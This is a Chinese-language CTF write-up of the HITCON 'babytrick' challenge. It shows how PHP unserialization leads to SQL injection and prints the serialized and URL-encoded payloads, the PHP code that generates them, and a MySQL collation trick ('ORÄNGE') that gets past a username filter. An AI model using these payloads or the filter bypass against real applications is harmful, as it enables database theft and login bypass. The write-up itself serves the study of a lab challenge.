分享好友 编程语言首页 频道列表

hitcon-babytrick题目分析与解答

PHP教程  2016-11-10 13:421

最近一直在研究和总结php中的序列化问题,发现php序列化的问题由来已久,除了在真实的php开源代码中会出现之外,如典型的 Joomla远程代码代码 执行,这种问题在ctf比赛中的也是备受青睐。本篇文章要讲的就是在hitcon上面的一道题目,其中也有对php 序列化的考察。

题目下载地址: github地址

通过show()方法找到

首先是需要对HITCON类进行序列化

class HITCON{
    private $method="show";
    private $args=array("' union select password,1,1 from users where username = 'orange'#");
    private $conn=1;
}
$hit = new HITCON();
$result = serialize($hit);
var_dump($result);

首先分析,提取到orange的密码。

payload为:

O:6:"HITCON":5:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:65:"' union select password,1,1 from users where username = 'orange'#";}s:12:"%00HITCON%00conn";i:0;}

其中的 %00 并不是表示三个字符,表示得chr(0)一个字符,所以需要进行转换。转换的结果如图1。

转换的方式也非常的简单,直接将其中的%00使用hackbar进行urldecode即可。

hitcon-babytrick题目分析与解答

最后进行提交的数据如下:

hitcon-babytrick题目分析与解答

最终我们得到 orange 的密码是 babytrick1234

login()方法

在执行了show()方法之后,按照同样的方法来执行login()方法。

payload为:

O:6:"HITCON":5:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{s:8:"username";s:6:"orange";s:8:"password";s:13:"babytrick1234";}s:12:"%00HITCON%00conn";i:1;}

转换之后的结果是:

hitcon-babytrick题目分析与解答

转换之后进行URL编码然后提交,

但是结果显示的是:

hitcon-babytrick题目分析与解答

仔细看代码,发现在login()方法中还存在如下的代码

if ( $username == 'orange' || stripos($sql, 'orange') != false ) {
    $this->__die("Orange is so shy. He do not want to see you.");
}

之前猪猪侠在微博上面说过的话,就可以绕过这个检测。原话如下:

MYSQL 中 utf8_unicode_ci和utf8_general_ci两种编码格式,utf8_general_ci不区分大小写,Ä = A, Ö = O, Ü = U这三种条件都成立,对于utf8_general_ci下面的等式成立:ß=s,但是,对于utf8_unicode_ci下面等式才成立:ß = ss

所以在将mysql的编码设置为 utf-8 的时候,Ä = A, Ö = O, Ü = U,,左右两边的字符是可以相互替换的。这样就可以将 0 替换为 Ö 这样就可以绕过上面代码的检测,同时还可以能够正确地执行SQL语句。

我们通过如下的代码得到最终的payload:

<?php
class HITCON{
    private $method;
    private $args;
    private $conn;

    public function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
}
$args['username'] = 'ORÄNGE';
$args['password'] = 'babytrick1234';
$data = new HITCON('login',$args);
print urlencode(serialize($data));
?>

所以最终的payload为:

O%3A6%3A%22HITCON%22%3A3%3A%7Bs%3A14%3A%22%00HITCON%00method%22%3Bs%3A5%3A%22login%22%3Bs%3A12%3A%22%00HITCON%00args%22%3Ba%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22OR%C3%84NGE%22%3Bs%3A8%3A%22password%22%3Bs%3A13%3A%22babytrick1234%22%3B%7Ds%3A12%3A%22%00HITCON%00conn%22%3BN%3B%7D

然后进行提交,最后就可以得到flag了。

最终的结果为:

hitcon-babytrick题目分析与解答

MISC

虽然这道题目是做出来了,但是其中还是存在一些问题没有搞清楚。

  1. 执行login()方法的时候,同样需要绕过 __wakeup() 方法,那么就需要利用 __wakeup() 函数的漏洞了,但是在最后执行的payload中并没有修改对象属性的个数,我看到网上有人猜测可能是 Ä 这个字符影响了 __wakeup() 函数的执行。
  2. O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÃnge";i:1;s:13:"babytrick1234";}s:12:"%00HITCON%00conn";O:9:"Exception":2:{s:7:"*file";R:4;};}} 这个payload是 0xecute 的答案。但是这个答案,我也没有看懂。不知道最后 O:9:"Exception":2:{s:7:"*file";R:4;};}} 有什么作用,我将上面的答案进行反序列化,发现反序列化失败。我将 O:9:"Exception":2:{s:7:"*file";R:4;};}} 修改为其他的值之后,发现无法得到flag。所以这一点就很奇怪了。

总结

在做这道题目的过程中,遇到了一些奇奇怪怪的问题,也请教了很多人,自己也进行了很多的尝试,但是毕竟情况太过于少见,大神们也无法当面解决,所以问题还是没有得到解决。

看来有些问题也只有靠自己才能够解决了。

查看更多关于【PHP教程】的文章

展开全文
相关推荐
反对 0
举报 0
评论 1
图文资讯
热门推荐
优选好物
更多热点专题
更多推荐文章
nginx和php-fpm 是使用 tcp socket 还是 unix socket ?
tcp socket允许通过网络进程之间的通信,也可以通过loopback进行本地进程之间通信。unix socket允许在本地运行的进程之间进行通信。分析从上面的图片可以看,unix socket减少了不必要的tcp开销,而tcp需要经过loopback,还要申请临时端口和tcp相关资源。但是

0评论2023-03-08437

PHP基于elasticsearch全文搜索引擎的开发 php使用es搜索引擎
1.概述:全文搜索属于最常见的需求,开源的 Elasticsearch (以下简称 Elastic)是目前全文搜索引擎的首选。Elastic 的底层是开源库 Lucene。但是,你没法直接用 Lucene,必须自己写代码去调用它的接口。Elastic 是 Lucene 的封装,提供了 REST API 的操作接

0评论2023-02-09676

php视图操作
一、视图的基本介绍         视图是虚拟的表。与包含数据的表不一样,视图只包含使用时动态检索数据的查询。        使用视图需要MySQL5及以后的版本支持。        下面是视图的一些常见应用:        重用SQL语句;        简化复杂的S

0评论2023-02-09320

php使用时间戳保存时间的意义 PHP获取时间戳
时间戳记录的是格林尼治时间,使用date格式化的时候会根据你程序设置的不同时区显示不同的时间。如果使用具体时间,则还需要进行多一步转换。

0评论2023-02-09607

PHP 获取提交表单数据方法
PHP $_GET 和 $_POST变量是用来获取表单中的信息的,比如用户输入的信息。PHP表单操作在我们处理HTML表单和PHP表单时,我们要记住的重要一点是:HTML页面中的任何一个表单元素都可以自动的用于PHP脚本:表单举例: htmlbodyform action="welcome.php" method

0评论2023-02-09522

php中file_get_contents与curl的区别 php get file content
做微信开发的时候,项目中需要用PHP去请求微信相关接口。刚开始使用的是file_get_contents这个函数,后来听朋友说最好用curl。自己尝试了下,也能成功请求微信的接口。这两个有什么区别呢?抱着好奇心查阅了相关资料后,才知道他们之间确实有很大的不同。1.fo

0评论2023-02-09764

PHP与java接口对接使用json格式请求 php接收post数据json
PHP与java接口对接使用json格式请求$datajson = json_encode($param);$myheader= array('Content-Type: application/json; charset=utf-8','Content-Length: ' . strlen($datajson));$result = http_curl($url, 'xml', $datajson, 6, FALSE, ''

0评论2023-02-09566

PHP会员找回密码功能的简单实现 php密码登录验证
文章来自:博客http://www.jb51.net/article/91944.htm 设置思路1、用户注册时需要提供一个E-MAIL邮箱,目的就是用该邮箱找回密码。2、当用户忘记密码或用户名时,点击登录页面的“找回密码”超链接,打开表单,并输入注册用的E-MAIL邮箱,提交。3、系统通过

0评论2023-02-09488

php 判断一个变量是否是合法的json
1.场景api验证前端json 类型字段合法性2.分析官网3.解决function json_validate($string) {if (is_string($string)) {@json_decode($string);return (json_last_error() === JSON_ERROR_NONE);}return false;} 

0评论2023-02-09411

Apache 的 php.ini 配置文件详解
[root@taokey ~]# grep -v ";" /application/php/lib/php.ini  [PHP]  engine = On  ——→  是否启用 PHP 解析引擎  short_open_tag = Off    ——→  是否使用简介标志  asp_tags = Off  ——→  不允许 asp 类标志  precision = 14  —

0评论2023-02-09716

PHP的几种输出方式 php输出格式
请写出echo、print_r、print、var_dump 、die之间的区别   echo  只能输出字符串等单一数据 不能输出数据类型 不能输出数组等多种数据   print()  只能输出字符串等单一数据 不能输出数据类型 不能输出数组等多种数据有返回值true/false   print_r()

0评论2023-02-09753

建设银行网上银行MD5withRSA php版
1. 首先通过java程序将建设银行的公钥串转成pem格式并写入文件SignTest.java是运行程序, RSASig.java是建设银行签名算法类, bcprov-jdk15-145.jar是PEMWriter类库 2. php程序做签名验证?php$data = "POSID=000000000BRANCHID=330000000ORDERID=2004010061P

0评论2023-02-09605

php服务器删除浏览器cookie php清除浏览器缓存
一、设置cookie的过期时间//将过期时间设为一小时前setcookie("TestCookie", "", time() - 3600);setcookie("TestCookie", "", time() - 3600, "/~rasmus/", ".utoronto.ca", 1);二、设置cookie的值为空setcookie($cookiename, ''

0评论2023-02-09874

Docker-用LaraDock搭建PHP环境 docker搭建php开发环境
简介LaraDock 致力于简化创建开发环境过程,能够帮助我们在 Docker 上快速搭建 PHP 开发环境。 它预装了 Docker 镜像,为我们提供了一站式的开发环境,而不需要再去在本地机器安装 PHP、Nginx、MySQL 以及其他很多开发过程中需要的软件。特点:在 PHP 版本:7

0评论2023-02-09851

更多推荐